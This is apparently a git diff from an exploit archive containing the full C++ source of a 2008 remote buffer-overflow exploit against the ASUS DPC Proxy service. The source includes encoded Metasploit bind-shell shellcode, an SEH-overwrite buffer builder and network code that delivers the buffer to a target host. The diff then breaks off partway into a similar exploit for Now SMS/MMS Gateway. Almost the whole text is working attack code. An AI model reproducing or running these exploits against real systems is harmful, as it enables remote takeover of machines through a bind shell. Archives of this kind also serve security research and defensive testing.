-	memset(cp, 'G', 1000-62-sizeof(JMPX)+1);
-	cp+=1000-62-sizeof(JMPX)+1;
-	
-		// code to jump back
-	memcpy(cp, JMPX,sizeof(JMPX)-1);
-	cp+=sizeof(JMPX)-1;
-
-		// next SEH record and back jump
-	*cp++='\x90';
-	*cp++='\x90';
-	*cp++='\xeb';
-	*cp++='\xec';
-
-		// replace SEH
-	*cp++ = (char)((targets[target].ret      ) & 0xff);
-	*cp++ = (char)((targets[target].ret >>  8) & 0xff);
-	*cp++ = (char)((targets[target].ret >> 16) & 0xff);
-	*cp++ = (char)((targets[target].ret >> 24) & 0xff);
-	
-	memset(cp, 'H', 1000);
-	cp+=1000;
-
-	sbuf->size=(int)(cp-sbuf->ptr);
-	return 1;
-}
-
-
-void extract_ip_and_port( char * &remotehost, int * port, char * str)
-{
-	if (strchr(str,':')==NULL)
-	{
-		remotehost=str;
-	}else 
-	{
-		sscanf(strchr(str,':')+1, "%d", port);
-		remotehost=str;
-		*(strchr(remotehost,':'))='\0';
-	}
-}
-
-
-
-int hr2_connect(char * remotehost, int port, int timeout)
-{
-	SOCKET s;
-	struct hostent *host;
-	struct sockaddr_in addr;
-	TIMEVAL stTime;
-	TIMEVAL *pstTime = NULL;
-	fd_set x;
-	int res;
-
-	if (INFINITE != timeout) 
-	{
-	    stTime.tv_sec = timeout / 1000;
-	    stTime.tv_usec = timeout % 1000;
-	    pstTime = &stTime;
-	}
-
-	host = gethostbyname(remotehost);
-	if (!host) return SOCKET_ERROR;
-
-	addr.sin_addr = *(struct in_addr*)host->h_addr;
-	addr.sin_port = htons(port);
-	addr.sin_family = AF_INET;
-
-	s = socket(AF_INET, SOCK_STREAM, 0);
-	if (s == SOCKET_ERROR)
-	{
-		closesocket(s);
-		return SOCKET_ERROR;
-	}
-
-	unsigned long l = 1;
-	ioctlsocket( s, FIONBIO, &l ) ;
-
-	connect(s, (struct sockaddr*)&addr, sizeof(addr));
-
-	FD_ZERO(&x);
-	FD_SET(s, &x);
-
-	res = select(NULL,NULL,&x,NULL,pstTime);
-	if(res< 0) return SOCKET_ERROR;
-	if(res==0) return 0;
-	return (int)s;
-}
-
-
-int hr2_tcpsend(SOCKET s, unsigned char * buf, unsigned int len, int timeout)
-{
-	return send(s, (char *)buf, len, 0);
-}
-
-int hr2_tcprecv(SOCKET s, unsigned char * buf, unsigned int len, int timeout)
-{
-	TIMEVAL stTime;
-	TIMEVAL *pstTime = NULL;
-	fd_set xy;
-	int res;
-
-	if (INFINITE != timeout) 
-	{
-	    stTime.tv_sec = timeout / 1000;
-	    stTime.tv_usec = timeout % 1000;
-	    pstTime = &stTime;
-	}
-	FD_ZERO(&xy);
-	FD_SET(s, &xy);
-	
-	res = select(NULL,&xy,NULL,NULL,pstTime);
-
-	if(res==0) return 0;
-	if(res<0) return -1;
-
-	return recv(s, (char *)buf, len, 0);
-}
-
-int execute(struct _buf * abuf, char * remotehost, int port)
-{
-	int x;
-	SOCKET s ;
-	unsigned char rbuf[7000];
-	unsigned int i;
-	int rsize=7000;
-	s = hr2_connect(remotehost, port, 10000);
-	if(s==0)
-	{
-		printf("   [-] connect() timeout\n");
-		return 0;
-	}
-	if(s==SOCKET_ERROR)
-	{
-		printf("   [-] Connection failed\n");
-		return 0;
-	}
-
-	x = hr2_tcprecv(s, rbuf, 5000, 10000);	
-	x = hr2_tcprecv(s, rbuf, 5000, 10000);
-	
-	for(i=0;isize/1000;i++)
-	{
-		printf("   [+] Chunk %d/%d sent\n", i+1,abuf->size/1000);
-		x = hr2_tcpsend(s, abuf->ptr+1000*i, 1000, 0);
-		if(x<1000) return -1;
-		Sleep(1000);
-		x = hr2_tcprecv(s, rbuf, 5000, 10000);
-	}
-	return 1;
-}
-
-
-// -----------------------------------------------------------------
-// XGetopt.cpp  Version 1.2
-// -----------------------------------------------------------------
-int getopt(int argc, char *argv[], char *optstring)
-{
-	static char *next = NULL;
-	if (optind == 0)
-		next = NULL;
-
-	optarg = NULL;
-
-	if (next == NULL || *next == '\0')
-	{
-		if (optind == 0)
-			optind++;
-
-		if (optind >= argc || argv[optind][0] != '-' || argv[optind][1] == '\0')
-		{
-			optarg = NULL;
-			if (optind < argc)
-				optarg = argv[optind];
-			return EOF;
-		}
-
-		if (strcmp(argv[optind], "--") == 0)
-		{
-			optind++;
-			optarg = NULL;
-			if (optind < argc)
-				optarg = argv[optind];
-			return EOF;
-		}
-
-		next = argv[optind];
-		next++;		// skip past -
-		optind++;
-	}
-
-	char c = *next++;
-	char *cp = strchr(optstring, c);
-
-	if (cp == NULL || c == ':')
-		return '?';
-
-	cp++;
-	if (*cp == ':')
-	{
-		if (*next != '\0')
-		{
-			optarg = next;
-			next = NULL;
-		}
-		else if (optind < argc)
-		{
-			optarg = argv[optind];
-			optind++;
-		}
-		else
-		{
-			return '?';
-		}
-	}
-
-	return c;
-}
-// -----------------------------------------------------------------
-// -----------------------------------------------------------------
-// -----------------------------------------------------------------
-
-
-void print_info_banner_line(const char * key, const char * val)
-{
-	char temp1[100], temp2[100];
-
-	memset(temp1,0,sizeof(temp1));	
-	memset(temp1, '\x20' , 58 - strlen(val) -1);	
-
-	memset(temp2,0,sizeof(temp2));
-	memset(temp2, '\x20' , 8 - strlen(key));	
-	printf(" #  %s%s: %s%s# \n", key, temp2, val, temp1);	
-
-}
-
-
-
-void usage(char * s)
-{	
-	int j;
-	printf("\n");
-	printf("    Usage: %s -h  -t \n", s);
-	printf("   -------------------------------------------------------------------\n");
-	printf("    Arguments:\n");
-	printf("      -h ........ host to attack, default port: 623\n");
-	printf("      -t ........ target to use\n");	
-	printf("      -T ........ socket timeout\n");
-	printf("\n");
-	printf("    Supported ASUS DPCProxy versions:\n");
-	for(j=0; targets[j].t!=0;j++)
-	{
-		printf("      %d. %s\n",j+1, targets[j].t);
-	}					
-	printf("\n");
-	for(j=0; shellcodes[j].name!=0;j++)
-	{
-		printf("      %d. %s\n",j+1, shellcodes[j].name);
-	}		
-	end_logo();	
-}
-
-void logo()
-{
-	printf("\n\n");
-	printf(" ####################################################################### \n");	
-	printf(" #     ____                 __  _                  ______  __    _____ #\n");
-	printf(" #    / __ \\________  _____/ /_(_)_________       / __/\\ \\/ /   / _  / #\n");
-	printf(" #   / / / / ___/ _ \\/ __ / __/ / ___/ __ / ___  / /    \\  /   / // /  #\n");
-	printf(" #  / /_/ / / /  ___/ /_// /_/ / /__/ /_// /__/ / _/    /  \\  / ___/   #\n");
-	printf(" # /_____/_/  \\___/ \\_,_/\\__/_/\\___/\\__,_/     /_/     /_/\\_\\/_/       #\n");
-	printf(" #                                 crew                                #\n");
-	printf(" ####################################################################### \n");	
-	printf(" #  Exploit : ASUS DPCPROXY Service 2.0.0.16-19                        # \n");
-	printf(" #  Author  : Heretic2 (http://www.dreatica.cl/)                       # \n");
-	printf(" #  Version : 1.0                                                      # \n");
-	printf(" #  System  : Windows ALL                                              # \n");
-	printf(" #  Date    : 02.04.2008 - 04.04.2008                                  # \n");
-	printf(" # ------------------------------------------------------------------- # \n");
-}
-
-void end_logo()
-{
-	printf(" # ------------------------------------------------------------------- # \n");
-	printf(" #                    Dreatica-FXP crew [Heretic2]                     # \n");	
-	printf(" ####################################################################### \n\n");
-}
-
-// milw0rm.com [2008-05-29]
+/* Dreatica-FXP crew
+* 
+* ----------------------------------------
+* Target         : ASUS DPC Proxy 2.0.0.16/2.0.0.24
+* ----------------------------------------
+* Exploit        : ASUS DPC Proxy 2.0.0.16/2.0.0.19 Remote Buffer Overflow Exploit
+* Exploit date   : 02.04.2008
+* Exploit writer : Heretic2 (heretic2x@gmail.com)
+* OS             : Windows ALL 
+* Crew           : Dreatica-FXP
+* Location       : http://www.milw0rm.com/
+* ----------------------------------------
+* Info           : Sending long buufer(however the buffer should be send by chunks)
+*                  we obtain a SEH exploitation, due to server bytes stricts i decided
+*                  to use here a alphanumeric shellcodes and jumps.
+* ----------------------------------------
+* Thanks to:
+*		1. Luigi Auriemma          ( http://aluigi.org    )
+*		2. The Metasploit project  ( http://metasploit.com                           ) 
+*       3. ALPHA 2: Zero-tolerance (                  ) 
+*		4. Dreatica-FXP crew       (                                                 )
+************************************************************************************
+* This was written for educational purpose only. Use it at your own risk. Author will be not be 
+* responsible for any damage, caused by that code.
+*/
+
+#include 
+#include 
+#include 
+#include 
+#include 
+
+#pragma comment(lib,"ws2_32")
+
+
+void usage(char * s);
+void logo();
+void end_logo();
+void print_info_banner_line(const char * key, const char * val);
+
+void extract_ip_and_port( char * &remotehost, int * port, char * str);
+int fill_payload_args(int sh, int bport, char * reverseip, int reverseport, struct h2readyp * xx);
+
+int hr2_connect(char * remotehost, int port, int timeout);
+int hr2_udpconnect(char * remotehost, int port,  struct sockaddr_in * addr, int timeout);
+int hr2_updsend(char * remotehost, unsigned char * buf, unsigned int len, int port, struct sockaddr_in * addr, int timeout);
+int execute(struct _buf * abuf, char * remotehost, int port);
+
+struct _buf 
+{
+	unsigned char * ptr;
+	unsigned int size;
+};
+int construct_shellcode(int sh, struct _buf * shf, int target);
+int construct_buffer(struct _buf * shf, int target, struct _buf * abuf);
+
+
+
+
+// -----------------------------------------------------------------
+// XGetopt.cpp  Version 1.2
+// -----------------------------------------------------------------
+int getopt(int argc, char *argv[], char *optstring);
+char	*optarg;		// global argument pointer
+int		optind = 0, opterr; 	// global argv index
+// -----------------------------------------------------------------
+// -----------------------------------------------------------------
+
+
+struct {
+	const char * name;
+	int length;
+	char *shellcode;	
+}shellcodes[]={ 	
+	{  "BindShell on 4444", 
+		/*
+		* windows/shell_bind_tcp - 696 bytes
+		* http://www.metasploit.com
+		* Encoder: x86/alpha_mixed
+		* EXITFUNC=seh, LPORT=4444
+		*/
+		696,
+		"\x89\xe6\xdb\xdd\xd9\x76\xf4\x5e\x56\x59\x49\x49\x49\x49\x49"
+		"\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51\x5a\x6a"
+		"\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32"
+		"\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49"
+		"\x4b\x4c\x43\x5a\x4a\x4b\x50\x4d\x4d\x38\x4a\x59\x4b\x4f\x4b"
+		"\x4f\x4b\x4f\x43\x50\x4c\x4b\x42\x4c\x51\x34\x47\x54\x4c\x4b"
+		"\x51\x55\x47\x4c\x4c\x4b\x43\x4c\x43\x35\x42\x58\x45\x51\x4a"
+		"\x4f\x4c\x4b\x50\x4f\x44\x58\x4c\x4b\x51\x4f\x51\x30\x45\x51"
+		"\x4a\x4b\x47\x39\x4c\x4b\x46\x54\x4c\x4b\x43\x31\x4a\x4e\x50"
+		"\x31\x49\x50\x4a\x39\x4e\x4c\x4b\x34\x49\x50\x43\x44\x43\x37"
+		"\x49\x51\x48\x4a\x44\x4d\x43\x31\x49\x52\x4a\x4b\x4b\x44\x47"
+		"\x4b\x46\x34\x47\x54\x47\x58\x42\x55\x4b\x55\x4c\x4b\x51\x4f"
+		"\x51\x34\x43\x31\x4a\x4b\x43\x56\x4c\x4b\x44\x4c\x50\x4b\x4c"
+		"\x4b\x51\x4f\x45\x4c\x45\x51\x4a\x4b\x43\x33\x46\x4c\x4c\x4b"
+		"\x4c\x49\x42\x4c\x46\x44\x45\x4c\x43\x51\x48\x43\x46\x51\x49"
+		"\x4b\x42\x44\x4c\x4b\x51\x53\x50\x30\x4c\x4b\x51\x50\x44\x4c"
+		"\x4c\x4b\x44\x30\x45\x4c\x4e\x4d\x4c\x4b\x51\x50\x44\x48\x51"
+		"\x4e\x45\x38\x4c\x4e\x50\x4e\x44\x4e\x4a\x4c\x50\x50\x4b\x4f"
+		"\x4e\x36\x42\x46\x51\x43\x45\x36\x42\x48\x50\x33\x47\x42\x45"
+		"\x38\x44\x37\x44\x33\x47\x42\x51\x4f\x50\x54\x4b\x4f\x48\x50"
+		"\x42\x48\x48\x4b\x4a\x4d\x4b\x4c\x47\x4b\x46\x30\x4b\x4f\x49"
+		"\x46\x51\x4f\x4d\x59\x4d\x35\x43\x56\x4b\x31\x4a\x4d\x45\x58"
+		"\x45\x52\x46\x35\x42\x4a\x44\x42\x4b\x4f\x48\x50\x43\x58\x4e"
+		"\x39\x44\x49\x4b\x45\x4e\x4d\x50\x57\x4b\x4f\x4e\x36\x46\x33"
+		"\x46\x33\x51\x43\x51\x43\x50\x53\x47\x33\x46\x33\x47\x33\x46"
+		"\x33\x4b\x4f\x48\x50\x43\x56\x42\x48\x42\x31\x51\x4c\x45\x36"
+		"\x51\x43\x4b\x39\x4d\x31\x4a\x35\x43\x58\x4e\x44\x44\x5a\x42"
+		"\x50\x48\x47\x46\x37\x4b\x4f\x48\x56\x42\x4a\x42\x30\x50\x51"
+		"\x50\x55\x4b\x4f\x4e\x30\x45\x38\x49\x34\x4e\x4d\x46\x4e\x4a"
+		"\x49\x51\x47\x4b\x4f\x4e\x36\x51\x43\x50\x55\x4b\x4f\x4e\x30"
+		"\x42\x48\x4a\x45\x51\x59\x4d\x56\x47\x39\x50\x57\x4b\x4f\x4e"
+		"\x36\x50\x50\x46\x34\x50\x54\x46\x35\x4b\x4f\x48\x50\x4c\x53"
+		"\x43\x58\x4b\x57\x42\x59\x49\x56\x42\x59\x50\x57\x4b\x4f\x48"
+		"\x56\x51\x45\x4b\x4f\x4e\x30\x43\x56\x43\x5a\x43\x54\x42\x46"
+		"\x43\x58\x45\x33\x42\x4d\x4b\x39\x4d\x35\x42\x4a\x46\x30\x51"
+		"\x49\x51\x39\x48\x4c\x4c\x49\x4d\x37\x43\x5a\x50\x44\x4c\x49"
+		"\x4a\x42\x46\x51\x49\x50\x4c\x33\x4e\x4a\x4b\x4e\x50\x42\x46"
+		"\x4d\x4b\x4e\x47\x32\x46\x4c\x4a\x33\x4c\x4d\x43\x4a\x50\x38"
+		"\x4e\x4b\x4e\x4b\x4e\x4b\x43\x58\x43\x42\x4b\x4e\x48\x33\x42"
+		"\x36\x4b\x4f\x42\x55\x47\x34\x4b\x4f\x48\x56\x51\x4b\x46\x37"
+		"\x51\x42\x50\x51\x50\x51\x50\x51\x42\x4a\x45\x51\x46\x31\x50"
+		"\x51\x46\x35\x50\x51\x4b\x4f\x48\x50\x45\x38\x4e\x4d\x4e\x39"
+		"\x43\x35\x48\x4e\x50\x53\x4b\x4f\x4e\x36\x43\x5a\x4b\x4f\x4b"
+		"\x4f\x47\x47\x4b\x4f\x48\x50\x4c\x4b\x51\x47\x4b\x4c\x4c\x43"
+		"\x49\x54\x42\x44\x4b\x4f\x48\x56\x51\x42\x4b\x4f\x4e\x30\x42"
+		"\x48\x4c\x30\x4c\x4a\x44\x44\x51\x4f\x50\x53\x4b\x4f\x48\x56"
+		"\x4b\x4f\x48\x50\x41\x41"
+
+	},
+	{NULL, 0, NULL}
+};
+ 
+struct _target{
+	const char *t ;
+	unsigned long ret ;
+} targets[]=
+{	
+	{"ASUS DpcProxy 2.0.0.16/2.0.0.19",      0x0040273b },
+	{"DOS/Crash/Debug/Test/Fun",             0x00400101 },
+	{NULL,                                   0x00000000 }
+};
+
+// memory for buffers
+unsigned char payloadbuffer[10000], a_buffer[10000];
+long dwTimeout=5000;
+int timeout=5000;
+
+int main(int argc, char **argv)
+{
+	char c,*remotehost=NULL,*file=NULL,*reverseip=NULL,*url=NULL,temp1[100];
+	int sh,port=623,itarget=0;
+	struct _buf  fshellcode, sbuffer;
+
+	logo();
+	if(argc<2)
+	{
+		usage(argv[0]);		
+		return -1;
+	}
+
+	WSADATA wsa;
+	WSAStartup(MAKEWORD(2,0), &wsa);
+	// set defaults
+	sh=0;	
+	// ------------	
+	
+	while((c = getopt(argc, argv, "h:t:R:T:"))!= EOF)
+	{
+		switch (c)
+		{
+			case 'h':
+				if (strchr(optarg,':')==NULL)
+				{
+					remotehost=optarg;
+				}else 
+				{
+					sscanf(strchr(optarg,':')+1, "%d", &port);
+					remotehost=optarg;
+					*(strchr(remotehost,':'))='\0';
+				}
+				break; 				
+			case 't':
+				sscanf(optarg, "%d", &itarget);
+				itarget--;
+				break;					
+			case 'T':				
+				sscanf(optarg, "%ld", &dwTimeout);
+				break; 			
+			default:
+	            usage(argv[0]);
+				WSACleanup();
+			return -1;
+		}		
+	}	
+	if(remotehost == NULL)
+	{
+		printf("   [-] Please enter remotehost\n");
+		end_logo();
+		WSACleanup();
+		return -1;
+	}
+	print_info_banner_line("Host", remotehost);
+	sprintf(temp1, "%d", port);
+	print_info_banner_line("Port", temp1);
+	print_info_banner_line("Payload", shellcodes[sh].name);
+
+	if(sh==0)
+	{		
+		sprintf(temp1, "%d", 4444);
+		print_info_banner_line("BINDPort", temp1);
+	}
+
+	printf(" # ------------------------------------------------------------------- # \n");
+	fflush(stdout);
+
+
+	memset(payloadbuffer, 0, sizeof(payloadbuffer));
+	fshellcode.ptr=payloadbuffer;
+	fshellcode.size=0;	
+
+	memset(a_buffer, 0, sizeof(a_buffer));
+	sbuffer.ptr=a_buffer;
+	sbuffer.size=0;
+
+	if(!construct_shellcode(sh, &fshellcode, itarget))
+	{
+		end_logo();
+		WSACleanup();
+		return -1;
+	}
+
+	printf("   [+] Payload constructed\n");
+	
+	if(!construct_buffer(&fshellcode, itarget, &sbuffer))
+	{
+		printf("   [-] Buffer not constructed\n");
+		end_logo();
+		WSACleanup();
+		return -1;
+	}
+	printf("   [+] Final buffer constructed\n");
+	
+
+	if(!execute(&sbuffer, remotehost, port))
+	{
+		printf("   [-] Buffer not sent\n");
+		end_logo();
+		WSACleanup();
+		return -1;
+	}
+	printf("   [+] Buffer sent\n");
+	
+	end_logo();
+	WSACleanup();
+	return 0;
+}
+
+int construct_shellcode(int sh, struct _buf * shf, int target)
+{
+	memcpy(shf->ptr, shellcodes[sh].shellcode, shellcodes[sh].length);
+	shf->size=shellcodes[sh].length;	
+	return 1;
+}
+
+
+char JMPX[] = 
+		// get ecx
+		"\x89\xE6\xDB\xDD\xD9\x76\xF4\x59"
+		// alphanum-decoder
+		"\x49\x49\x49" 
+		"\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x37\x51\x5a\x6a\x41"
+		"\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42\x42"
+		"\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49"
+		// encoded jump
+		"\x59\x6f\x7a\x47\x41"
+		// back jump
+		"\x89\xE6\xDB\xDD\xD9\x76\xF4\x5f\x81\xef\xf8\x1a\x00\x00\xeb\xb3";
+
+int construct_buffer(struct _buf * shf, int target, struct _buf * sbuf)
+{
+	unsigned char * cp = sbuf->ptr;
+	memset(cp, 'A', 1000);
+	cp+=20;
+	memcpy(cp, shf->ptr, shf->size);
+	cp+=1000-20;
+	memset(cp, 'B', 1000);
+	cp+=1000;
+	memset(cp, 'C', 1000);
+	cp+=1000;
+	memset(cp, 'D', 1000);
+	cp+=1000;
+	memset(cp, 'E', 1000);
+	cp+=1000;
+	memset(cp, 'F', 1000);
+	cp+=1000;
+	memset(cp, 'G', 1000-62-sizeof(JMPX)+1);
+	cp+=1000-62-sizeof(JMPX)+1;
+	
+		// code to jump back
+	memcpy(cp, JMPX,sizeof(JMPX)-1);
+	cp+=sizeof(JMPX)-1;
+
+		// next SEH record and back jump
+	*cp++='\x90';
+	*cp++='\x90';
+	*cp++='\xeb';
+	*cp++='\xec';
+
+		// replace SEH
+	*cp++ = (char)((targets[target].ret      ) & 0xff);
+	*cp++ = (char)((targets[target].ret >>  8) & 0xff);
+	*cp++ = (char)((targets[target].ret >> 16) & 0xff);
+	*cp++ = (char)((targets[target].ret >> 24) & 0xff);
+	
+	memset(cp, 'H', 1000);
+	cp+=1000;
+
+	sbuf->size=(int)(cp-sbuf->ptr);
+	return 1;
+}
+
+
+void extract_ip_and_port( char * &remotehost, int * port, char * str)
+{
+	if (strchr(str,':')==NULL)
+	{
+		remotehost=str;
+	}else 
+	{
+		sscanf(strchr(str,':')+1, "%d", port);
+		remotehost=str;
+		*(strchr(remotehost,':'))='\0';
+	}
+}
+
+
+
+int hr2_connect(char * remotehost, int port, int timeout)
+{
+	SOCKET s;
+	struct hostent *host;
+	struct sockaddr_in addr;
+	TIMEVAL stTime;
+	TIMEVAL *pstTime = NULL;
+	fd_set x;
+	int res;
+
+	if (INFINITE != timeout) 
+	{
+	    stTime.tv_sec = timeout / 1000;
+	    stTime.tv_usec = timeout % 1000;
+	    pstTime = &stTime;
+	}
+
+	host = gethostbyname(remotehost);
+	if (!host) return SOCKET_ERROR;
+
+	addr.sin_addr = *(struct in_addr*)host->h_addr;
+	addr.sin_port = htons(port);
+	addr.sin_family = AF_INET;
+
+	s = socket(AF_INET, SOCK_STREAM, 0);
+	if (s == SOCKET_ERROR)
+	{
+		closesocket(s);
+		return SOCKET_ERROR;
+	}
+
+	unsigned long l = 1;
+	ioctlsocket( s, FIONBIO, &l ) ;
+
+	connect(s, (struct sockaddr*)&addr, sizeof(addr));
+
+	FD_ZERO(&x);
+	FD_SET(s, &x);
+
+	res = select(NULL,NULL,&x,NULL,pstTime);
+	if(res< 0) return SOCKET_ERROR;
+	if(res==0) return 0;
+	return (int)s;
+}
+
+
+int hr2_tcpsend(SOCKET s, unsigned char * buf, unsigned int len, int timeout)
+{
+	return send(s, (char *)buf, len, 0);
+}
+
+int hr2_tcprecv(SOCKET s, unsigned char * buf, unsigned int len, int timeout)
+{
+	TIMEVAL stTime;
+	TIMEVAL *pstTime = NULL;
+	fd_set xy;
+	int res;
+
+	if (INFINITE != timeout) 
+	{
+	    stTime.tv_sec = timeout / 1000;
+	    stTime.tv_usec = timeout % 1000;
+	    pstTime = &stTime;
+	}
+	FD_ZERO(&xy);
+	FD_SET(s, &xy);
+	
+	res = select(NULL,&xy,NULL,NULL,pstTime);
+
+	if(res==0) return 0;
+	if(res<0) return -1;
+
+	return recv(s, (char *)buf, len, 0);
+}
+
+int execute(struct _buf * abuf, char * remotehost, int port)
+{
+	int x;
+	SOCKET s ;
+	unsigned char rbuf[7000];
+	unsigned int i;
+	int rsize=7000;
+	s = hr2_connect(remotehost, port, 10000);
+	if(s==0)
+	{
+		printf("   [-] connect() timeout\n");
+		return 0;
+	}
+	if(s==SOCKET_ERROR)
+	{
+		printf("   [-] Connection failed\n");
+		return 0;
+	}
+
+	x = hr2_tcprecv(s, rbuf, 5000, 10000);	
+	x = hr2_tcprecv(s, rbuf, 5000, 10000);
+	
+	for(i=0;isize/1000;i++)
+	{
+		printf("   [+] Chunk %d/%d sent\n", i+1,abuf->size/1000);
+		x = hr2_tcpsend(s, abuf->ptr+1000*i, 1000, 0);
+		if(x<1000) return -1;
+		Sleep(1000);
+		x = hr2_tcprecv(s, rbuf, 5000, 10000);
+	}
+	return 1;
+}
+
+
+// -----------------------------------------------------------------
+// XGetopt.cpp  Version 1.2
+// -----------------------------------------------------------------
+int getopt(int argc, char *argv[], char *optstring)
+{
+	static char *next = NULL;
+	if (optind == 0)
+		next = NULL;
+
+	optarg = NULL;
+
+	if (next == NULL || *next == '\0')
+	{
+		if (optind == 0)
+			optind++;
+
+		if (optind >= argc || argv[optind][0] != '-' || argv[optind][1] == '\0')
+		{
+			optarg = NULL;
+			if (optind < argc)
+				optarg = argv[optind];
+			return EOF;
+		}
+
+		if (strcmp(argv[optind], "--") == 0)
+		{
+			optind++;
+			optarg = NULL;
+			if (optind < argc)
+				optarg = argv[optind];
+			return EOF;
+		}
+
+		next = argv[optind];
+		next++;		// skip past -
+		optind++;
+	}
+
+	char c = *next++;
+	char *cp = strchr(optstring, c);
+
+	if (cp == NULL || c == ':')
+		return '?';
+
+	cp++;
+	if (*cp == ':')
+	{
+		if (*next != '\0')
+		{
+			optarg = next;
+			next = NULL;
+		}
+		else if (optind < argc)
+		{
+			optarg = argv[optind];
+			optind++;
+		}
+		else
+		{
+			return '?';
+		}
+	}
+
+	return c;
+}
+// -----------------------------------------------------------------
+// -----------------------------------------------------------------
+// -----------------------------------------------------------------
+
+
+void print_info_banner_line(const char * key, const char * val)
+{
+	char temp1[100], temp2[100];
+
+	memset(temp1,0,sizeof(temp1));	
+	memset(temp1, '\x20' , 58 - strlen(val) -1);	
+
+	memset(temp2,0,sizeof(temp2));
+	memset(temp2, '\x20' , 8 - strlen(key));	
+	printf(" #  %s%s: %s%s# \n", key, temp2, val, temp1);	
+
+}
+
+
+
+void usage(char * s)
+{	
+	int j;
+	printf("\n");
+	printf("    Usage: %s -h  -t \n", s);
+	printf("   -------------------------------------------------------------------\n");
+	printf("    Arguments:\n");
+	printf("      -h ........ host to attack, default port: 623\n");
+	printf("      -t ........ target to use\n");	
+	printf("      -T ........ socket timeout\n");
+	printf("\n");
+	printf("    Supported ASUS DPCProxy versions:\n");
+	for(j=0; targets[j].t!=0;j++)
+	{
+		printf("      %d. %s\n",j+1, targets[j].t);
+	}					
+	printf("\n");
+	for(j=0; shellcodes[j].name!=0;j++)
+	{
+		printf("      %d. %s\n",j+1, shellcodes[j].name);
+	}		
+	end_logo();	
+}
+
+void logo()
+{
+	printf("\n\n");
+	printf(" ####################################################################### \n");	
+	printf(" #     ____                 __  _                  ______  __    _____ #\n");
+	printf(" #    / __ \\________  _____/ /_(_)_________       / __/\\ \\/ /   / _  / #\n");
+	printf(" #   / / / / ___/ _ \\/ __ / __/ / ___/ __ / ___  / /    \\  /   / // /  #\n");
+	printf(" #  / /_/ / / /  ___/ /_// /_/ / /__/ /_// /__/ / _/    /  \\  / ___/   #\n");
+	printf(" # /_____/_/  \\___/ \\_,_/\\__/_/\\___/\\__,_/     /_/     /_/\\_\\/_/       #\n");
+	printf(" #                                 crew                                #\n");
+	printf(" ####################################################################### \n");	
+	printf(" #  Exploit : ASUS DPCPROXY Service 2.0.0.16-19                        # \n");
+	printf(" #  Author  : Heretic2 (http://www.dreatica.cl/)                       # \n");
+	printf(" #  Version : 1.0                                                      # \n");
+	printf(" #  System  : Windows ALL                                              # \n");
+	printf(" #  Date    : 02.04.2008 - 04.04.2008                                  # \n");
+	printf(" # ------------------------------------------------------------------- # \n");
+}
+
+void end_logo()
+{
+	printf(" # ------------------------------------------------------------------- # \n");
+	printf(" #                    Dreatica-FXP crew [Heretic2]                     # \n");	
+	printf(" ####################################################################### \n\n");
+}
+
+// milw0rm.com [2008-05-29]
diff --git a/platforms/windows/remote/5695.cpp b/platforms/windows/remote/5695.cpp
index cce46f45f..552ae3f7c 100755
--- a/platforms/windows/remote/5695.cpp
+++ b/platforms/windows/remote/5695.cpp
@@ -1,774 +1,774 @@
-/* Dreatica-FXP crew
-* 
-* ----------------------------------------
-* Target         : Now SMS/MMS Gateway v5.5 and others
-* ----------------------------------------
-* Exploit        : Now SMS/MMS Gateway v5.5 Remote Buffer Overflow Exploit
-* Exploit date   : 14.04.2008
-* Exploit writer : Heretic2 (heretic2x@gmail.com)
-* OS             : Windows ALL 
-* Tested         : Windows 2000 Server
-* Crew           : Dreatica-FXP
-* Location       : http://www.milw0rm.com/
-* ----------------------------------------
-* Info           : We obtain EIP after sending a long Authentificate request to server
-*                  Egghunter help here.
-* ----------------------------------------
-* Thanks to:
-*		1. Luigi Auriemma          ( http://aluigi.org    )
-*		2. The Metasploit project  ( http://metasploit.com                           ) 
-*       3. ALPHA 2: Zero-tolerance (                  ) 
-*		4. Dreatica-FXP crew       (                                                 )
-************************************************************************************
-* This was written for educational purpose only. Use it at your own risk. Author will be not be 
-* responsible for any damage, caused by that code.
-*/
-
-#include 
-#include 
-#include 
-#include 
-#include 
-
-#pragma comment(lib,"ws2_32")
-
-
-void usage(char * s);
-void logo();
-void end_logo();
-void print_info_banner_line(const char * key, const char * val);
-
-void extract_ip_and_port( char * &remotehost, int * port, char * str);
-int  fill_payload_args(int sh, int bport, char * reverseip, int reverseport, struct h2readyp * xx);
-void base64_encode(unsigned char const* bytes_to_encode, unsigned int in_len, char * ret);
-
-int hr2_connect(char * remotehost, int port, int timeout);
-int hr2_udpconnect(char * remotehost, int port,  struct sockaddr_in * addr, int timeout);
-int hr2_updsend(char * remotehost, unsigned char * buf, unsigned int len, int port, struct sockaddr_in * addr, int timeout);
-int execute(struct _buf * abuf, char * remotehost, int port);
-
-struct _buf 
-{
-	unsigned char * ptr;
-	unsigned int size;
-};
-int construct_shellcode(int sh, struct _buf * shf, int target,char * rerverseip, int reverseport);
-int construct_buffer(struct _buf * shf, int target, struct _buf * abuf);
-
-
-
-
-// -----------------------------------------------------------------
-// XGetopt.cpp  Version 1.2
-// -----------------------------------------------------------------
-int getopt(int argc, char *argv[], char *optstring);
-char	*optarg;		// global argument pointer
-int		optind = 0, opterr; 	// global argv index
-// -----------------------------------------------------------------
-// -----------------------------------------------------------------
-
-
-struct {
-	const char * name;
-	int length;
-	char *shellcode;	
-}shellcodes[]={ 	
-	 {"Bindshell, port 4444   [ args: none          ]", 696, 
-		 /* win32_bind -  EXITFUNC=seh LPORT=4444 Size=696 Encoder=Alpha2 http://metasploit.com */
-		"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x37\x49\x49\x49"
-		"\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x51\x5a\x6a\x42"
-		"\x58\x50\x30\x42\x31\x41\x42\x6b\x42\x41\x52\x42\x32\x42\x41\x32"
-		"\x41\x41\x30\x41\x41\x58\x50\x38\x42\x42\x75\x6a\x49\x4b\x4c\x62"
-		"\x4a\x68\x6b\x30\x4d\x59\x78\x49\x69\x4b\x4f\x79\x6f\x69\x6f\x71"
-		"\x70\x4e\x6b\x32\x4c\x51\x34\x64\x64\x6e\x6b\x41\x55\x77\x4c\x4c"
